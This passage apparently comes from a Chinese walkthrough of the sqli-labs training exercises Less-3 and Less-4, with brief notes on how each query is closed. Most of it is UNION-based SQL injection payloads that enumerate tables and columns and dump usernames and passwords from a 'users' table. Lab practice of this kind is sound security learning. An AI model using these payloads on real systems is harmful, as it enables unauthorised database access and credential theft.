?id=1 order by 3 -- - ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- - ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- - ?id=-1 union select 1,2,group_concat(username,'~',password) from users -- -
less-3
看错误提示可知,需要用')来闭合,剩下的和第一题一样。
1 2 3 4
?id=1') order by 3 -- - ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- - ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- - ?id=-1') union select 1,2,group_concat(username,'~',password) from users -- -
less-4
看错误提示,可知闭合方式是"),但是单引号不会报错,剩下的和第一题一样。
1 2 3 4
?id=1") order by 3 -- - ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- - ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- - ?id=-1") union select 1,2,group_concat(username,'~',password) from users -- -